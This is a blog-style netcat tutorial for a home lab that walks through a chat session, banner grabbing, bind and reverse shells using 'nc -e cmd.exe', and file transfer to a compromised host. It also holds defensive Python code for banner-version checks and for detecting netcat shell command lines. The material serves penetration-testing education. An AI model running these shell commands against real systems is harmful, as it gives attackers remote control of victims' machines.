Welcome back hackers! In this article, I will provide instruction on utilizing the awesome power of netcat. Commonly dubbed the swiss army knife of the hacker’s toolkit, netcat can do many things that are of use to hackers. After reading this article, you will learn how to perform the following functions using netcat:
- Establish a simple chat room.
- Perform Banner Grabbing.
- Establish bind and reverse shells.
- Transfer files between Kali and target.
So first things first – what is netcat exactly? At its simplest, netcat is a tool that is capable of reading and writing data across a network using TCP or UDP as its transport protocol. Netcat is of great use to hackers because it allows us to quickly and easily set up network connections for many different tasks and situations. We will examine netcat’s capabilities through several examples. But first, let’s make sure you set up your lab environment.
You will require two systems to practice these exercises. I recommend the following:
Kali Linux VM – netcat is pre-installed so no downloads/installation required
Windows OS VM or Host – netcat is not installed by default on Windows systems, so you will have to download it from: https://joncraton.org/files/nc111nt.zip
Be advised that the Windows firewall will often block unsolicited network traffic. If these exercises are not working correctly, you may need to disable your firewall or add an exception.
Starting a Simple Chat Session
To illustrate how netcat works, we’ll start by setting up a simple chat session.
1. Use netcat on Kali to start the chat server.
root@kali2:~# nc -nlvvp 1234
-n requires that an IP address is entered rather than a hostname. DNS resolution will not be performed.
-l places netcat into “listen mode”, meaning it is listening for inbound connections. In this instance, your Kali system is functioning as the chat server.
-vv places netcat in double verbose mode, for detailed command line feedback.
-p specifies the listening port, in this case 1234.
2. Connect to chat server from Windows system.
C:\nc.exe -nvv [KALI IP Address] 1234
You should now have a simple chat server established. Type in your Kali system and observe the text output on your Windows system. Press ctrl+c to terminate the session.
Perform Banner Grabbing
Banner grabbing is the act of connecting to a network service in order to elicit information about it. Let’s see this in action.
1. Start the Apache web service on Kali. This is the service we’ll “banner grab.”
root@kali:~# service apache2 start
2. Grab Apache banner using netcat. Notice that we are connecting to ourselves by using the loopback address (127.0.0.1).
root@kali:~# nc -nv 127.0.0.1 80
3. Once the connection is established, enter some random keystrokes and hit enter.
4. Examine the response. In the header information, we are presented with the version of the running Apache service:
<address>Apache/2.4.10 (Debian) Server at 127.0.1.1 Port 80</address>
This technique is extremely useful. Knowing the application version enables you to perform exploit research specific to the application running on your target. Try searching Exploit-DB and see if any exploit code exists for your version of Apache.
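As an added example (not code from the original article), here is the banner grab above done from Python so you can check what your own server discloses: it connects, sends a line of junk, reads the reply until the server closes, and reports which parts of the reply carry a product/version string. The loopback server and its reply are constructed for this example; only the <address> line is taken from the article.

```python
import re
import socket
import threading

# Constructed reply resembling what default Apache 2.4.10 returns to junk input; only the
# <address> line comes from the article, the rest is made up for this example.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Server: Apache/2.4.10 (Debian)\r\n"
    b"Connection: close\r\n\r\n"
    b"<html><body><h1>Bad Request</h1>\r\n"
    b"<address>Apache/2.4.10 (Debian) Server at 127.0.1.1 Port 80</address>\r\n"
)

def start_fake_server():
    """Throwaway loopback listener that answers every connection with SAMPLE_RESPONSE."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(5)
    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.recv(1024)         # swallow whatever the client typed
                conn.sendall(SAMPLE_RESPONSE)
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def grab_banner(host, port, probe=b"junk\r\n", timeout=3.0):
    """What `nc -nv host port` plus a line of keystrokes does: connect, send, read until close."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(probe)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")

def version_disclosure(banner):
    """Return the banner fragments that leak a product/version string (empty dict if none)."""
    leaks = {}
    m = re.search(r"^Server:\s*(\S+/\S+.*)$", banner, re.M)
    if m:
        leaks["server"] = m.group(1).strip()
    m = re.search(r"<address>([^<]*/[^<]*)</address>", banner)
    if m:
        leaks["address"] = m.group(1).strip()
    return leaks
```

On a real Apache host, setting ServerTokens Prod and ServerSignature Off removes both disclosures; point grab_banner at the service again afterwards to confirm version_disclosure returns nothing.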
Establishing a Bind Shell
One of the most useful capabilities of netcat is its ability to redirect command input/output across a network. We will use this feature to establish a bind shell, which will enable us to remotely control the Windows platform from Kali. For this exercise, think of a bind shell as “the attacker connecting directly to the victim.”
NOTE: You will likely need to disable the Windows firewall to perform this exercise.
1. Prepare a netcat listener on the Windows system. Notice that we are listening on port 1234. When a connection is established, the -e option will execute the cmd.exe command and redirect its input and output across the network, enabling us, the attacker, to remotely control the system.
C:\nc.exe -nlvp 1234 -e cmd.exe
2. Connect to Windows system from Kali.
root@kali:~# nc -nv [Windows IP address] 1234
If performed correctly, you will be presented with a shell and can now remotely enter commands as if you were physically on the Windows system. You can do the exact same thing on Linux systems substituting /bin/bash for cmd.exe.
Establishing a Reverse Shell
One of the problems with bind shells is that they tend to be blocked by firewalls as unsolicited connections. A reverse shell circumvents this protection because it appears that the user initiated the connection. To clarify, a reverse shell can simply be thought of as “the victim connecting to the attacker,” which usually has the effect of bypassing firewall restrictions. Let’s see this in action.
Note: To add realism to this exercise, try it with the Windows firewall enabled.
1. Establish a netcat listener on Kali on TCP port 4321.
root@kali:~# nc -nlvp 4321
2. Establish reverse shell connection from Windows.
C:\nc.exe -nvv [Kali IP] 4321 -e cmd.exe
You should now have a shell, despite the presence of an active firewall. Nice!
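The flip side of the bind and reverse shell sections above is spotting them in process logs. As an added example (not part of the original article), this Python triage classifies netcat command lines like the ones used above: a listener that executes a program is labelled a bind shell, an outbound connection that executes a program a reverse shell, and ordinary listeners and clients are left alone. The log records are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation records (command lines only) mixing the article's bind and
# reverse shell invocations with ordinary netcat use and an unrelated program.
SAMPLE_EVENTS = [
    r"C:\nc.exe -nlvp 1234 -e cmd.exe",          # listener that hands out cmd.exe: bind shell
    r"C:\nc.exe -nvv 10.0.0.5 4321 -e cmd.exe",  # outbound connect that hands out cmd.exe: reverse shell
    "nc -nlvvp 1234",                            # plain listener (the chat server)
    "nc -nv 127.0.0.1 80",                       # plain client (the banner grab)
    r"C:\nc.exe -nlvp 4444",                     # plain listener (the file receiver)
    "notepad.exe report.txt",
]

NETCAT_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # -e/-c: traditional nc; --exec/--sh-exec: ncat

def classify(cmdline):
    """Label one command line: 'bind-shell', 'reverse-shell', 'listener', 'client', or None."""
    argv = shlex.split(cmdline, posix=False)     # non-POSIX mode keeps Windows backslashes intact
    if not argv:
        return None
    image = re.split(r"[\\/]", argv[0])[-1].lower()
    if image not in NETCAT_NAMES:
        return None
    listening = executes = False
    for arg in argv[1:]:
        if arg in EXEC_FLAGS:
            executes = True
        elif arg == "--listen":
            listening = True
        elif arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]:
            listening = True                     # clustered short options such as -nlvp
    if executes:
        return "bind-shell" if listening else "reverse-shell"
    return "listener" if listening else "client"

def triage(events):
    """Return (command line, label) for every event that ties a shell to a socket."""
    hits = []
    for event in events:
        label = classify(event)
        if label in ("bind-shell", "reverse-shell"):
            hits.append((event, label))
    return hits
```

Pair the command-line label with the network event (inbound accept for a bind shell, outbound connect for a reverse shell) before alerting; a renamed netcat binary defeats the name check, so the socket-plus-child-process pattern is the more robust signal.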
Transferring Files with Netcat
I have been on many engagements where, after gaining an initial shell, I needed to utilize additional tools that were not already present on the file system to perform tasks such as privilege escalation, password dumping, etc. Netcat can help us in this regard by enabling us to transfer files from one system to another. For this exercise, we will attempt to transfer “whoami.exe” from Kali to Windows.
1. Prepare Windows to receive file via netcat.
C:\nc.exe -nlvp 4444 > whoami.exe
2. Push file from Kali to Windows.
root@kali:~# cd /usr/share/windows-binaries/
root@kali:~# nc -nv [Windows IP] 4444 < whoami.exe
Notice that you do not receive feedback from netcat about the file transfer. You must wait a minute or two before closing the connection and verifying that your file is present. Once complete, try running whoami.exe from the command line.
In this article we reviewed how to use netcat to start a chat session, perform banner grabbing, establish bind/reverse shells, and transfer files. Mastering these basic tasks will arm you with the skills needed to become a proficient hacker/penetration tester. Next week we will examine deploying netcat payloads in simple remote access exploits.
To conclude this article, I have several exercises for you to confirm your mastery of the subject matter. Practice the exercises until you can perform them quickly from memory.
- Banner Grabbing: Start the SSH service on your Kali system (service ssh start), then banner grab TCP port 22. What version of SSH is your Kali system running? Google it to research any published exploits or documented vulnerabilities.
- Bind Shell: Establish a bind shell from Kali to Windows and Windows to Kali. Experiment with and without firewalls. Understand how a firewall impedes your bind shell.
- Reverse Shell: Establish a reverse shell from Windows to Kali and then Kali to Windows. Try this task with the Windows firewall enabled. Did it work?
- File Transfer: Practice transferring files from Kali to Windows and Windows to Kali.
Try the above exercise while running a packet capture through Wireshark or TCPDump. What do you notice about your traffic? Is it encrypted? Why might this be a problem?
Research the tool “ncat” and learn how to encrypt your traffic with SSL. Try replicating all of the above exercises using ncat with SSL encryption enabled. Use Wireshark or TCPDump to sniff the traffic. Is it encrypted? How might this be beneficial?